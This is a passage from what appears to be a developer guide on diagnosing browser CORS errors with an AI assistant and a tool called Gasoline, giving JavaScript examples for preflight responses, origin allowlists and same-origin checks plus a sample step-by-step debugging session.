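      return { ...res, headers: { ...CORS_HEADERS, ...res.headers } };
    } catch (err) {
      // Crash responses get CORS headers too.
      return { status: 500, headers: { ...CORS_HEADERS }, body: { error: err.message } };
    }
  };
}
```

In Express terms, the equivalent is registering the cors middleware before your routes and making sure your error-handling middleware doesn’t short-circuit it.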

What the AI sees: Two requests in the waterfall — an OPTIONS request returning 404, and no follow-up request.

The fix: The server doesn’t handle OPTIONS requests for that route. Add an OPTIONS handler or configure your framework’s CORS middleware to handle preflight requests.
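A correct preflight answer looks roughly like this. The header values are examples — adjust the methods and allowed headers to your API:

```javascript
// Sketch of an OPTIONS (preflight) response builder.
function preflightResponse(requestOrigin, allowedOrigins) {
  if (!allowedOrigins.includes(requestOrigin)) {
    return { status: 403, headers: {} }; // origin not on the allowlist
  }
  return {
    status: 204, // a preflight answer needs no body
    headers: {
      'Access-Control-Allow-Origin': requestOrigin,
      'Access-Control-Allow-Methods': 'GET, POST, PUT, DELETE, OPTIONS',
      'Access-Control-Allow-Headers': 'Content-Type, Authorization',
      'Access-Control-Max-Age': '86400', // let the browser cache the preflight
    },
  };
}
```

If this OPTIONS route returns a 404 (as in this scenario), the browser never sends the real request at all.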

What the AI sees: Response has Access-Control-Allow-Origin: *, request has credentials: include. Error says “wildcard cannot be used with credentials.”

The fix: Replace * with the specific origin. The AI can read the Origin header from the request and configure the server to echo it back (with a whitelist).
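The echo-with-allowlist pattern is a small function. The allowlist entries below are example values, not from the article:

```javascript
// Sketch: choose CORS headers for a credentialed request. Browsers reject
// '*' when credentials are included, so echo the Origin back only if it is
// on an explicit allowlist.
const ALLOWED_ORIGINS = new Set([
  'http://localhost:3000',
  'https://app.example.com', // example entry
]);

function corsHeadersFor(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {}; // unknown origin: no CORS headers
  return {
    'Access-Control-Allow-Origin': requestOrigin, // echo, never '*'
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // caches must key responses on the Origin header
  };
}
```

The Vary: Origin header matters here: without it, a cache could serve one origin’s response, and its Access-Control-Allow-Origin value, to a different origin.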

What the AI sees: Server code sends CORS headers (the AI can read the source), but the response in the browser doesn’t have them.

Diagnosis: Something between the server and browser is stripping headers. The AI checks nginx configs, Cloudflare settings, or reverse proxy configuration.

Here’s what it looks like end-to-end:

You: “I’m getting a CORS error when calling the API.”

The AI:

  1. Calls observe({what: "errors"}) — sees the CORS error with URL and origin
  2. Calls observe({what: "network_bodies", url: "/api"}) — sees the actual response (a 500 with a database error)
  3. Reads the server code — finds the missing error handler that skips CORS middleware
  4. Fixes the error handler to pass through CORS middleware even on errors
  5. Calls interact({action: "refresh"}) — reloads the page
  6. Calls observe({what: "errors"}) — confirms the CORS error is gone

Total time: 2 minutes. No manual DevTools inspection. No guessing about headers. No Stack Overflow rabbit holes.

Chrome DevTools has a fundamental limitation for CORS debugging: it hides the response body for CORS-blocked requests. The Network tab shows the request was blocked, but you can’t see what the server actually returned.

This means you can’t tell the difference between:

  • A correctly configured server that’s missing one header
  • A server that’s completely crashing and returning a 500

Gasoline captures the response at the network level before CORS enforcement, so the AI sees everything — headers, body, status code. The diagnosis goes from “something is wrong with CORS” to “the server returned a 500 because the database is down, and the error handler doesn’t set CORS headers.”

Check the timeline, not just the error. CORS errors sometimes cascade — one failed preflight blocks ten subsequent requests. The timeline shows the cascade pattern so you fix the root cause, not the symptoms.

Look at both staging and production headers. CORS works in staging with * but breaks in production with credentials? The network bodies show exactly which headers each environment returns.

Watch for mixed HTTP/HTTPS. http://localhost:3000 and https://localhost:3000 are different origins. The AI’s transport security check (observe({what: "security_audit", checks: ["transport"]})) catches this mismatch.
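You can check two URLs for same-origin with the standard URL API — an origin is the scheme, host, and port together:

```javascript
// Two URLs share an origin only if scheme, host, and port all match.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

sameOrigin('http://localhost:3000/a', 'https://localhost:3000/b'); // → false (scheme differs)
sameOrigin('http://localhost:3000/a', 'http://localhost:3000/b');  // → true
```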

Use error_bundles for context. observe({what: "error_bundles"}) returns the CORS error along with the correlated network request and recent actions — everything in one call instead of three.